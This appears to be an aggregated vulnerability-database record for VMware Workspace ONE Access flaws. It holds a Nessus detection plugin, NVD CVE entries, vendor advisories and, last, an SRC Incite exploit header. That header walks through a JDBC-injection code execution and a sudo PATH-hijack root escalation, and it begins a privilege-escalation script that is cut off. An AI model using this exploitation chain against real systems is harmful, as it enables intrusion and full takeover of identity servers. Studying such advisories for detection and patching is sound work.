script_name(english:\"VMware Workspace One Access / VMware Identity Manager Multiple Vulnerabilities (VMSA-2022-0021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An identity store broker application running on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The VMware Workspace One Access (formerly VMware Identity Manager) application running on the remote host is affected\nby the following vulnerabilities:\n\n - An authentication bypass vulnerability affecting local domain users. A malicious actor with network access\n to the UI may be able to obtain administrative access without the need to authenticate. (CVE-2022-31656)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger\n a remote code execution. (CVE-2022-31658)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger\n a remote code execution. 
(CVE-2022-31659)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2022-0021.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://core.vmware.com/vmsa-2022-0021-questions-answers-faq\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.vmware.com/s/article/89096\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the HW-160130 hotfix to VMware Workspace One Access / VMware Identity Manager as per the VMSA-2022-0021 advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-31656\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware Workspace ONE Access CVE-2022-31660');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:identity_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:workspace_one_access\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_workspace_one_access_web_detect.nbin\", \"vmware_workspace_one_access_installed.nbin\");\n script_require_keys(\"installed_sw/VMware Workspace ONE Access\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app = 'VMware Workspace ONE Access';\n\nvar app_info = vcf::vmware_workspace_one_access::get_app_info(combined:TRUE);\n\n# 3.3.[3456] don't have fixed builds, so audit out unless we are doing a paranoid scan\n# Remote detection does not pull hotfixes. Require paranoia\nif ((app_info.webapp || app_info.version =~ \"3\\.3\\.[3456]\\.\") && report_paranoia < 2)\n audit(AUDIT_POTENTIAL_VULN, app, app_info.version);\n\nvar patch = '160130';\n\nvar constraints = [\n { 'min_version':'3.3.4.0.0', 'fixed_version':'3.3.7.0.0', 'fixed_display':'Refer to vendor advisory and apply patch HW-160130.' },\n\n { 'min_version':'19.03.0.1', 'max_version':'19.03.0.1.99999999', 'fixed_display':'19.03.0.1 with HW-160130' },\n \n { 'min_version':'21.08.0.0.0', 'max_version':'21.08.0.0.99999999', 'fixed_display':'21.08.0.0 with HW-160130' },\n { 'min_version':'21.08.0.1', 'max_version':'21.08.0.1.99999999', 'fixed_display':'21.08.0.1 with HW-160130' }\n];\n\nvcf::vmware_workspace_one_access::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, expected_patch:patch);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-08-11T18:57:07", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. 
A malicious actor with administrator and network access can trigger a remote code execution.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T16:15:00", "type": "cve", "title": "CVE-2022-31658", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-31658"], "modified": "2022-08-11T16:06:00", "cpe": ["cpe:/a:vmware:identity_manager:3.3.4", "cpe:/a:vmware:access_connector:21.08.0.1", "cpe:/a:vmware:identity_manager:3.3.6", "cpe:/a:vmware:one_access:21.08.0.1", "cpe:/a:vmware:access_connector:22.05", "cpe:/a:vmware:identity_manager:3.3.5", "cpe:/a:vmware:one_access:21.08.0.0", "cpe:/a:vmware:identity_manager_connector:19.03.0.1", "cpe:/a:vmware:identity_manager_connector:3.3.4", "cpe:/a:vmware:identity_manager_connector:3.3.6", "cpe:/a:vmware:identity_manager_connector:3.3.5", "cpe:/a:vmware:access_connector:21.08.0.0"], "id": "CVE-2022-31658", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31658", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:19.03.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:22.05:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*", 
"cpe:2.3:a:vmware:identity_manager_connector:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-08-11T18:57:09", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T16:15:00", "type": "cve", "title": "CVE-2022-31656", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-31656"], "modified": "2022-08-11T16:02:00", "cpe": ["cpe:/a:vmware:identity_manager:3.3.4", "cpe:/a:vmware:access_connector:21.08.0.1", "cpe:/a:vmware:identity_manager:3.3.6", "cpe:/a:vmware:one_access:21.08.0.1", "cpe:/a:vmware:access_connector:22.05", "cpe:/a:vmware:identity_manager:3.3.5", "cpe:/a:vmware:one_access:21.08.0.0", "cpe:/a:vmware:identity_manager_connector:19.03.0.1", "cpe:/a:vmware:identity_manager_connector:3.3.4", "cpe:/a:vmware:identity_manager_connector:3.3.6", "cpe:/a:vmware:identity_manager_connector:3.3.5", "cpe:/a:vmware:access_connector:21.08.0.0"], "id": "CVE-2022-31656", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31656", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:19.03.0.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:22.05:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-08-11T18:56:57", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T16:15:00", "type": "cve", "title": "CVE-2022-31665", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-31665"], "modified": "2022-08-11T16:14:00", "cpe": ["cpe:/a:vmware:identity_manager:3.3.4", "cpe:/a:vmware:identity_manager:3.3.6", "cpe:/a:vmware:one_access:21.08.0.1", "cpe:/a:vmware:identity_manager:3.3.5", "cpe:/a:vmware:one_access:21.08.0.0", "cpe:/a:vmware:identity_manager_connector:19.03.0.1", "cpe:/a:vmware:identity_manager_connector:3.3.4", "cpe:/a:vmware:identity_manager_connector:3.3.6", "cpe:/a:vmware:identity_manager_connector:3.3.5"], "id": "CVE-2022-31665", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31665", 
"cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:19.03.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-08-11T18:57:06", "description": "VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T16:15:00", "type": "cve", "title": "CVE-2022-31659", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-31659"], "modified": "2022-08-11T16:09:00", "cpe": ["cpe:/a:vmware:identity_manager:3.3.4", "cpe:/a:vmware:identity_manager:3.3.6", "cpe:/a:vmware:access_connector:22.08.0.0", "cpe:/a:vmware:one_access:21.08.0.1", "cpe:/a:vmware:access_connector:22.08.0.1", "cpe:/a:vmware:identity_manager:3.3.5", "cpe:/a:vmware:one_access:21.08.0.0", "cpe:/a:vmware:identity_manager_connector:19.03.0.1", "cpe:/a:vmware:identity_manager_connector:3.3.4", "cpe:/a:vmware:identity_manager_connector:3.3.6", "cpe:/a:vmware:identity_manager_connector:3.3.5", 
"cpe:/a:vmware:access_connector:22.05"], "id": "CVE-2022-31659", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31659", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:19.03.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:22.05:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:22.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:22.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.1:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-10-13T22:36:08", "description": "An authentication bypass vulnerability exists in VMWare Workspace One Access. 
Successful exploitation of this vulnerability would allow a remote attacker to obtain sensitive information and gain unauthorized access to the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-30T00:00:00", "type": "checkpoint_advisories", "title": "VMWare Workspace One Access Authentication Bypass (CVE-2022-31656)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-31656"], "modified": "2022-08-30T00:00:00", "id": "CPAI-2022-0516", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-13T22:36:05", "description": "A remote code execution vulnerability exists in VMWare Workspace One Access. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-30T00:00:00", "type": "checkpoint_advisories", "title": "VMWare Workspace One Access Remote Code Execution (CVE-2022-31659)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-31659"], "modified": "2022-08-30T00:00:00", "id": "CPAI-2022-0522", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "srcincite": [{"lastseen": "2022-08-11T21:13:10", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of VMware Workspace ONE Access, although authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the ApplicationSetupController class. The issue results from the lack of proper validation of a user-supplied string before using it to perform a database connection. An attacker can leverage this vulnerability to execute code in the context of the horizon user.\n\n**Affected Vendors:**\n\nVMWare\n\n**Affected Products:**\n\nWorkspace ONE Access, Identity Manager, vRealize Automation\n\n**Vendor Response:**\n\nVMWare has issued an update to correct this vulnerability. 
More details can be found at: <https://www.vmware.com/security/advisories/VMSA-2022-0021.html>\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T00:00:00", "type": "srcincite", "title": "SRC-2022-0015 : VMware Workspace ONE Access ApplicationSetupController dbTestConnection JDBC Injection Remote Code Execution Vulnerability (patch bypass)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-4006", "CVE-2022-22958", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-02T00:00:00", "id": "SRC-2022-0015", "href": "https://srcincite.io/advisories/src-2022-0015/", "sourceData": "#!/usr/bin/env python3\r\n\"\"\"\r\nVMware Workspace ONE Access ApplicationSetupController dbTestConnection JDBC Injection Remote Code Execution Exploit\r\nSteven Seeley of Qihoo 360 Vulnerability Research Institute\r\n\r\n# Summary:\r\n\r\nThis vulnerability allows a remote attacker authenticated as admin to execute remote code as horizon. The attacker can chain this with another vulnerability to achieve code execution as root.\r\n\r\n# Notes:\r\n\r\nThis is a patch bypass for CVE-2022-22958 chained with a new LPE exploit. 
VMware has patched the bugs in this report and released an advisory here: https://www.vmware.com/security/advisories/VMSA-2022-0021.html.\r\n\r\n# Vulnerability Analysis:\r\n\r\n## ApplicationSetupController dbTestConnection JDBC Injection (CVE-2022-31665)\r\n\r\nInside of the com.vmware.horizon.svadmin.controller.ApplicationSetupController we can see the following code:\r\n\r\n```java\r\n/* */ public AjaxResponse dbTestConnection(@RequestParam(\"jdbcurl\") String jdbcUrl, @RequestParam(\"dbUsername\") String dbUsername, @RequestParam(\"dbPassword\") String dbPassword) { try {\r\n/* 65 */ validateDbFields(jdbcUrl, dbUsername, dbPassword);\r\n/* 66 */ } catch (AdminPortalException e) {\r\n/* 67 */ return new AjaxResponse(Messages.getMessage(e.getErrorId(), e.getArgs()), Integer.valueOf(1), false);\r\n/* */ } \r\n/* */ \r\n/* */ try {\r\n/* 71 */ log.info(\"Testing database connection... jdbcUrl {}, dbUsername {}, passwordSet? {}\", new Object[] { jdbcUrl, dbUsername, \r\n/* 72 */ Boolean.valueOf(StringUtils.isNotBlank(dbPassword)) });\r\n/* 73 */ dbPassword = getDatabasePassword(dbPassword);\r\n/* 74 */ this.applicationSetupService.testDatabaseConnection(jdbcUrl, dbUsername, dbPassword); // 1 \r\n/* 75 */ } catch (AdminPortalException e) {\r\n/* 76 */ String error = null;\r\n/* 77 */ if (StringUtils.isNotBlank(e.getMessage())) {\r\n/* 78 */ error = this.applianceDiagnosticService.getLocalizedDBErrorMessages(e.getMessage());\r\n/* */ }\r\n/* */ \r\n/* 81 */ return new AjaxResponse(Messages.getMessage(\"configurator.configure.db.testFailed\", new Object[] { error\r\n/* 82 */ }), Integer.valueOf(2), false);\r\n/* */ } \r\n/* 84 */ return new AjaxResponse(Messages.getMessage(\"configurator.configure.db.testSuccess\"), Integer.valueOf(0), true); }\r\n```\r\n\r\nAt [1] the code calls `ApplicationSetupService.testDatabaseConnection`\r\n\r\n```java\r\n/* */ public void testDatabaseConnection(@NotNull String jdbcUrl, @NotNull String dbUsername, @NotNull String dbPassword, 
boolean checkCreateTableAccess) throws AdminPortalException {\r\n/* */ String[] cmd;\r\n/* 210 */ log.debug(\"Testing db connection params jdbcUrl: {}\", jdbcUrl);\r\n/* */ \r\n/* 212 */ String encryptedPwd = this.configEncrypter.encrypt(dbPassword);\r\n/* */ \r\n/* */ \r\n/* 215 */ dbUsername = AppliancePasswordService.escapeArg(dbUsername);\r\n/* 216 */ jdbcUrl = AppliancePasswordService.escapeArg(jdbcUrl);\r\n/* */ \r\n/* 218 */ if (Const.isWindowsDeployment) {\r\n/* 219 */ cmd = new String[] { COMMAND_SHELL, COMMAND_SHELL_ARG, \"\\\"\\\"\" + TEST_DB_CONNECTION_CMD + \"\\\"\" + \" \" + jdbcUrl + \" \" + dbUsername + \" \\\"\" + encryptedPwd + \"\\\" \" + checkCreateTableAccess + \"\\\"\" };\r\n/* */ } else {\r\n/* 221 */ cmd = new String[] { COMMAND_SHELL, COMMAND_SHELL_ARG, TEST_DB_CONNECTION_CMD + \" \" + jdbcUrl + \" \" + dbUsername + \" '\" + encryptedPwd + \"' \" + checkCreateTableAccess };\r\n/* */ } \r\n/* */ \r\n/* */ try {\r\n/* 225 */ CommandUtils.executeCommand(cmd); // 2\r\n/* 226 */ } catch (CommandException e) {\r\n/* 227 */ log.error(String.format(\"Error testing DB Connection with jdbc url: %s, user: %s.\", new Object[] { jdbcUrl, dbUsername }));\r\n/* 228 */ throw new AdminPortalException(StringUtils.removeStart(e.getStdOut(), \"ERROR:\").trim(), e);\r\n/* 229 */ } catch (IOException e) {\r\n/* 230 */ log.error(String.format(\"Error testing DB Connection with jdbc url: %s, user: %s.\", new Object[] { jdbcUrl, dbUsername }));\r\n/* 231 */ throw new AdminPortalException(e.getMessage(), e);\r\n/* */ } \r\n/* */ }\r\n```\r\n\r\nAt [2] the code executes the `/usr/local/horizon/bin/dbConnCheck` script which runs the following command. The `AppliancePasswordService.escapeArg` method is safe from injection attacks here (patch for CVE-2020-4006). 
Inside the script, we see the code drops privileges and calls `com.vmware.horizon.dbConnectionCheck.Main`:\r\n\r\n```sh\r\nif [[ $EUID -eq 0 ]]; then\r\n params=()\r\n for v in \"$@\" ; do\r\n params+=( $(escape \"$v\") )\r\n done\r\n su ${TOMCAT_USER} -c \"$JAVACMD $HZN_TOOL_OPTS -cp ${BC_JAR}:${ADMIN_JAR} com.vmware.horizon.dbConnectionCheck.Main ${params[*]}\" 2>/dev/null\r\nelse\r\n $JAVACMD $HZN_TOOL_OPTS -cp ${BC_JAR}:${ADMIN_JAR} com.vmware.horizon.dbConnectionCheck.Main $@ 2>/dev/null\r\nfi\r\n```\r\n\r\nThe resultant command is:\r\n\r\n```\r\nsu horizon -c /usr/java/jre-vmware/bin/java -Dlog4j.configurationFile=file:/usr/local/horizon/conf/saas-log4j.properties -Dcatalina.base=/opt/vmware/horizon/workspace -Didm.fips.mode.required=true -Djava.security.properties=/opt/vmware/horizon/workspace/conf/idm_fips.security -Dorg.bouncycastle.fips.approved_only=true -cp /usr/local/horizon/jre-endorsed/bc-fips-1.0.1.BC-FIPS-Certified.jar:/usr/local/horizon/jars/dbConnection-0.1-jar-with-dependencies.jar com.vmware.horizon.dbConnectionCheck.Maintrue 2>/dev/null\r\n```\r\n\r\nwhere the jdbc url is controlled by the attacker. This can lead to an attacker crafting a jdbc uri that specifies a mysql driver and triggers deserialization of untrusted data. The `CommonsBeanutils1` gadget from ysoserial will work to enable an attacker to gain remote code execution.\r\n\r\nBelow is the stack trace starting from the `com.vmware.horizon.dbConnectionCheck.Main` class that is executing a command (see poc.png):\r\n\r\n```\r\nProcessBuilder.start() line: 1007 [local variables unavailable]\t\r\nNativeMethodAccessorImpl.invoke0(Method, Object, Object[]) line: not available [native method]\t\r\nNativeMethodAccessorImpl.invoke(Object, Object[]) line: 62\t\r\nDelegatingMethodAccessorImpl.invoke(Object, Object[]) line: 43\t\r\nMethod.invoke(Object, Object...) line: 498\t\r\nReflectiveMethodExecutor.execute(EvaluationContext, Object, Object...) 
line: 129\t\r\nMethodReference.getValueInternal(EvaluationContext, Object, TypeDescriptor, Object[]) line: 139\t\r\nMethodReference.access$000(MethodReference, EvaluationContext, Object, TypeDescriptor, Object[]) line: 55\t\r\nMethodReference$MethodValueRef.getValue() line: 387\t\r\nCompoundExpression.getValueInternal(ExpressionState) line: 92\t\r\nCompoundExpression(SpelNodeImpl).getValue(ExpressionState) line: 112\t\r\nSpelExpression.getValue(EvaluationContext) line: 272\t\r\nStandardBeanExpressionResolver.evaluate(String, BeanExpressionContext) line: 166\t\r\nDefaultListableBeanFactory(AbstractBeanFactory).evaluateBeanDefinitionString(String, BeanDefinition) line: 1575\t\r\nBeanDefinitionValueResolver.doEvaluate(String) line: 280\t\r\nBeanDefinitionValueResolver.evaluate(TypedStringValue) line: 237\t\r\nBeanDefinitionValueResolver.resolveValueIfNecessary(Object, Object) line: 205\t\r\nDefaultListableBeanFactory(AbstractAutowireCapableBeanFactory).applyPropertyValues(String, BeanDefinition, BeanWrapper, PropertyValues) line: 1702\t\r\nDefaultListableBeanFactory(AbstractAutowireCapableBeanFactory).populateBean(String, RootBeanDefinition, BeanWrapper) line: 1447\t\r\nDefaultListableBeanFactory(AbstractAutowireCapableBeanFactory).doCreateBean(String, RootBeanDefinition, Object[]) line: 593\t\r\nDefaultListableBeanFactory(AbstractAutowireCapableBeanFactory).createBean(String, RootBeanDefinition, Object[]) line: 516\t\r\nDefaultListableBeanFactory(AbstractBeanFactory).lambda$doGetBean$0(String, RootBeanDefinition, Object[]) line: 324\t\r\n761923430.getObject() line: not available\t\r\nDefaultListableBeanFactory(DefaultSingletonBeanRegistry).getSingleton(String, ObjectFactory>) line: 234\t\r\nDefaultListableBeanFactory(AbstractBeanFactory).doGetBean(String, Class, Object[], boolean) line: 322\t\r\nDefaultListableBeanFactory(AbstractBeanFactory).getBean(String) line: 202\t\r\nDefaultListableBeanFactory.preInstantiateSingletons() line: 
897\t\r\nFileSystemXmlApplicationContext(AbstractApplicationContext).finishBeanFactoryInitialization(ConfigurableListableBeanFactory) line: 879\t\r\nFileSystemXmlApplicationContext(AbstractApplicationContext).refresh() line: 551\t\r\nFileSystemXmlApplicationContext.(String[], boolean, ApplicationContext) line: 142\t\r\nFileSystemXmlApplicationContext.(String) line: 85\t\r\nNativeConstructorAccessorImpl.newInstance0(Constructor>, Object[]) line: not available [native method]\t\r\nNativeConstructorAccessorImpl.newInstance(Object[]) line: 62\t\r\nDelegatingConstructorAccessorImpl.newInstance(Object[]) line: 45\t\r\nConstructor.newInstance(Object...) line: 423\t\r\nObjectFactory.instantiate(String, Properties, boolean, String) line: 62\t\r\nSocketFactoryFactory.getSocketFactory(Properties) line: 39\t\r\nConnectionFactoryImpl.openConnectionImpl(HostSpec[], String, String, Properties) line: 182\t\r\nConnectionFactory.openConnection(HostSpec[], String, String, Properties) line: 51\t\r\nPgConnection.(HostSpec[], String, String, Properties, String) line: 223\t\r\nDriver.makeConnection(String, Properties) line: 465\t\r\nDriver.connect(String, Properties) line: 264\t\r\nDriverManager.getConnection(String, Properties, Class>) line: 664\t\r\nDriverManager.getConnection(String, String, String) line: 247\t\r\nDbConnectionCheckServiceImpl$FactoryHelper.getConnection(String, String, String) line: 444\t\r\nDbConnectionCheckServiceImpl.testConnection(String, String, String, boolean) line: 141\t\r\nDbConnectionCheckServiceImpl.checkConnection(String, String, String, boolean) line: 95\t\r\nMain.main(String[]) line: 61\t\r\n```\r\n\r\n## ntpServer.hzn Privilege Escalation Vulnerability (CVE-2022-31664)\r\n\r\nInside of the /etc/sudoers file we see:\r\n\r\n```\r\n...\r\nhorizon ALL = NOPASSWD: /usr/local/horizon/scripts/horizonService.sh, \\\r\n...\r\n/usr/local/horizon/scripts/ntpServer.hzn, \\\r\n...\r\n```\r\n\r\nThis means we can execute the /usr/local/horizon/scripts/ntpServer.hzn 
script as root. Studying this file we find:\r\n\r\n```\r\n...\r\nfunction check_ntp_server() {\r\n # check connectivity to the given ntp server\r\n NTP_SERVER=$1\r\n for i in $(echo $NTP_SERVER | tr \",\" \"\\n\")\r\n do\r\n echo \"####### Checking for NTP server : $i ########\"\r\n sntp $i // 2\r\n echo \"##############################################################\"\r\n echo \" \"\r\n done\r\n}\r\n...\r\ncase \"$1\" in\r\n --get)\r\n get_ntp_server\r\n ;;\r\n --check)\r\n if [ -z \"$2\" ]\r\n then\r\n usage\r\n fi\r\n check_ntp_server $2 // 1\r\n```\r\n\r\nThis code will call `check_ntp_server` at [1]. Then at [2] the code executes the file `sntp`. The problem here is that the file doesn't exist:\r\n\r\n```\r\nroot@vidm [ /home/sshuser ]# find / -type f -name \"sntp\"\r\nroot@vidm [ /home/sshuser ]#\r\n```\r\n\r\nSo an attacker can modify the path and add a writeable directory to it and then create the sntp file:\r\n\r\n```\r\nhorizon@vidm [ /tmp ]$ cat lpe\r\n#!/bin/bash\r\nFILENAME=sntp\r\nrm -rf $FILENAME\r\ncd /tmp\r\necho '#!/bin/bash' 